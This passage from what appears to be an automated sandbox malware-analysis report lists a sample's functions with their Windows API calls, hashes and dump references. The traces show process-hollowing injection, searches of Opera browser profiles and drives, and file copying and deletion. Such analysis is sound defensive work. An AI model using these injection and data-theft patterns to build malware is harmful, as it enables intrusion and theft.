                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F1668
                                      • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 002F16A4
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 002F16B3
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F15F6
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F18F5
                                        • Part of subcall function 002F6C20: LocalFree.KERNEL32(?,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CA9
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F1967
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002F19A8
                                      • FindClose.KERNEL32(00000000), ref: 002F19B7
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2220404975-1173974218
                                      • Opcode ID: 47fc87a0416f642c8cb18971b96e98ad066e03594a23030afaa733e76b30d0cf
                                      • Instruction ID: cce209395dd87e03840c4719b7d1c9b746985a2c68f53d7c7492db61c4798a9c
                                      • Opcode Fuzzy Hash: 47fc87a0416f642c8cb18971b96e98ad066e03594a23030afaa733e76b30d0cf
                                      • Instruction Fuzzy Hash: 7C32037193010CAADB59EBA0DD66EFDB378AF54780F404178F60666191EF70AB68CF60
                                      Function 002FED80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 157threadinjectionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 002FEDB8
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 002FEDDC
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 002FEDF6
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 002FEE0C
                                      • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000), ref: 002FEE2C
                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 002FEE45
                                      • ResumeThread.KERNEL32(?), ref: 002FEE55
                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 002FEE70
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 002FEEB7
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 002FEEE9
                                      • SetThreadContext.KERNEL32(?,?), ref: 002FEEFF
                                      • ResumeThread.KERNEL32(?), ref: 002FEF09
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateReadmemset
                                      • String ID: (
                                      • API String ID: 1041758820-3887548279
                                      • Opcode ID: 2046ffb001da37487cd0db9ef7da6cda2268e22851e5182a2ef8cef2b77ae3af
                                      • Instruction ID: 49c1512ca63b7fe8e92a06e30ac416bed9e2dd52b1e531d3e7b8133ea3a6c3f3
                                      • Opcode Fuzzy Hash: 2046ffb001da37487cd0db9ef7da6cda2268e22851e5182a2ef8cef2b77ae3af
                                      • Instruction Fuzzy Hash: 295173B5A10209AFDB20CFA4DC85FAAB7B9FF48714F108519FA09E7290D774B815CB94
                                      Function 003056C0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 003056DF
                                      • FindFirstFileA.KERNEL32(?,?), ref: 003056F6
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 0030571C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305736
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305774
                                      • lstrcat.KERNEL32(?,02F43188), ref: 00305788
                                      • lstrcat.KERNEL32(?,?), ref: 0030579C
                                      • lstrcat.KERNEL32(?,?), ref: 003057AA
                                      • lstrcat.KERNEL32(?,003101E0), ref: 003057BC
                                      • lstrcat.KERNEL32(?,?), ref: 003057D0
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00305863
                                      • FindClose.KERNEL32(00000000), ref: 00305872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpywsprintf
                                      • String ID: %s\%s
                                      • API String ID: 1833283839-4073750446
                                      • Opcode ID: 34801624abdd832f61dc10f32b1532abf688765ace642f374e34f9ddc27c691d
                                      • Instruction ID: adb1db75ac2e6cfe0abb2259ee302709cc96c9ce5a278d99a9c7f3a485bf1950
                                      • Opcode Fuzzy Hash: 34801624abdd832f61dc10f32b1532abf688765ace642f374e34f9ddc27c691d
                                      • Instruction Fuzzy Hash: 4541BAB551120CABDB29EB70DD99EFE737CAF54700F0485A8FA0592091EB709B49CF61
                                      Function 002FA2C0 Relevance: 19.8, APIs: 7, Strings: 4, Instructions: 512fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003101E9), ref: 002FA322
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FA34C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FA366
                                      • StrCmpCA.SHLWAPI(00000000,Opera,003101E9,003101E9,003101E9,003101E9,003101E9,003101E9,003101E9), ref: 002FA3DD
                                      • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 002FA3F1
                                      • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 002FA405
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 002F9D40: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003101E9), ref: 002F9D8B
                                        • Part of subcall function 002F9D40: StrCmpCA.SHLWAPI(?,003101DC), ref: 002F9DAE
                                        • Part of subcall function 002F9D40: StrCmpCA.SHLWAPI(?,003101D8), ref: 002F9DC8
                                      • FindNextFileA.KERNEL32(?,?), ref: 002FA984
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                      • API String ID: 3824151033-1710495004
                                      • Opcode ID: e312d0cebb034a6f380600ffe975b97518e1251105716368c565adcb7c4ff5ce
                                      • Instruction ID: a95d30b7b4815c59133138c9a14bb7ebdd0f680996ec2837bd7460ae77511ef1
                                      • Opcode Fuzzy Hash: e312d0cebb034a6f380600ffe975b97518e1251105716368c565adcb7c4ff5ce
                                      • Instruction Fuzzy Hash: 9E12347192010C6BDB59FB70DE66EFDB378AF54780F404178F60662291EF70AA68CE61
                                      Function 003053C0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 161stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0030541D
                                      • memset.MSVCRT ref: 0030543E
                                      • GetDriveTypeA.KERNEL32(00000000), ref: 00305447
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00305466
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00305484
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003054A7
                                      • lstrlen.KERNEL32(00000000), ref: 0030550E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                      • API String ID: 1884655365-147700698
                                      • Opcode ID: f9d1ad991903f08d82108c21125a16cbe802c1ddafaf9f12a5ef7edf03c1a257
                                      • Instruction ID: b595b03306df3303b3a5d6b7f43fe58cd4436b38642cc9b82a41f5177c3bd5d5
                                      • Opcode Fuzzy Hash: f9d1ad991903f08d82108c21125a16cbe802c1ddafaf9f12a5ef7edf03c1a257
                                      • Instruction Fuzzy Hash: 4D519E71510208ABDB75EF30CD96FFE736CAF54740F548024FA0A6A292DF70AA59CB61
                                      Function 002FAAB0 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 373filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 002FAAD0
                                      • FindFirstFileA.KERNEL32(?,?), ref: 002FAAE7
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FAB0C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FAB26
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • lstrlen.KERNEL32(00000000,003101E9,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002FABB6
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      • DeleteFileA.KERNEL32(00000000,00000000,?,02F45090,?,?,?,003101E0,?,00000000,?,02F43308), ref: 002FAE58
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FAE72
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002FAF64
                                      • FindClose.KERNEL32(00000000), ref: 002FAF73
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
